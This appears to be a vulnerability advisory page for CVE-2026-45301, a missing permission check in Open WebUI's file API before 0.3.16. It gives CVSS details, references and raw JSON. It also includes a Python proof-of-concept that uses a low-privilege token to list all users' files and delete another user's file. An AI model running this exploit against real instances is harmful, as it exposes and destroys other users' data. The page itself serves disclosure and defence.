CVE-2026-45301

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.3.16

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
base_url = "http://target-open-webui-instance.com"

# Attacker's low-privilege session token
attacker_token = "eyJhbGciOiJIUzI1NiIs..."

headers = {
    "Authorization": f"Bearer {attacker_token}",
    "Content-Type": "application/json"
}

# 1. List all files (Exploiting missing permission check)
list_endpoint = f"{base_url}/api/v1/files/list"
response = requests.get(list_endpoint, headers=headers)

if response.status_code == 200:
    files_data = response.json()
    print("[+] Successfully leaked file list:", files_data)

    # 2. Delete a file owned by another user (if ID is known)
    # Assuming file_id '12345' belongs to Admin
    target_file_id = "12345"
    delete_endpoint = f"{base_url}/api/v1/files/delete/{target_file_id}"
    
    del_resp = requests.delete(delete_endpoint, headers=headers)
    if del_resp.status_code == 200:
        print(f"[+] Successfully deleted file ID: {target_file_id}")
    else:
        print(f"[-] Failed to delete file ID: {target_file_id}")
else:
    print("[-] Failed to exploit the vulnerability.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45301
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45301
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45301/
[4] VulDB https://vuldb.com/cve/CVE-2026-45301
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45301", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:53.837", "lastModified": "2026-05-15T22:16:53.837", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.3.16, a missing permission check in all files related API endpoints allows any authenticated user to list, access and delete every file uploaded by every user to the platform. This vulnerability is fixed in 0.3.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-r8wh-8m7r-fh33", "source": "[email protected]"}]}}